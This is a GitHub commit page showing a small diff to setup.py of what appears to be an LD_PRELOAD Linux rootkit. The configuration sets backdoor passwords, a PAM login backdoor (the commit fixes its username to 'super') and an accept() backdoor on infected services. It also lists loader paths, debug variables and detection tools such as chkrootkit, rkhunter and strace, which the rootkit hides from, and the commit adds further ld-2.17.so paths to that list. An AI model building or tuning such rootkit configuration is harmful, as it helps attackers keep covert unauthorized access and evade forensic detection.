Skip to content

Commit 1c604ee

Browse files
authored
Update setup.py
1 parent a91d84e commit 1c604ee

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

setup.py

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -8,7 +8,7 @@
88
BACKDOOR_PASS = None # password for all doors. set to None = random
99

1010
USE_PAM_BD = True
11-
PAM_UNAME = None # set to None = random
11+
PAM_UNAME = "super" # set to None = random
1212

1313
# accept() backdoor. allows backdoor access via infected services on the box.
1414
# must have a dedicated port number for this. dedicated port cannot be used for other stuff.
@@ -154,7 +154,7 @@
154154
# c. or just processes whose names match those below.
155155
scary_variables = ['LD_TRACE_LOADED_OBJECTS', 'LD_DEBUG', 'LD_AUDIT']
156156
scary_paths = ['*/*ld-linux*.so.*', '*ld-linux*.so.*',
157-
'*/*ld-*.so', '*ld-*.so', '*/ld-*.so.*']
157+
'*/*ld-*.so', '*ld-*.so', '*/ld-*.so.*', '/usr/lib64/ld-2.17.so', '/usr/lib/ld-2.17.so']
158158
scary_procs = ['chkrootkit', 'lsrootkit', 'ldd', 'unhide', 'rkhunter',
159159
'chkproc', 'chkdirs', 'ltrace','strace']
160160

0 commit comments

Comments
 (0)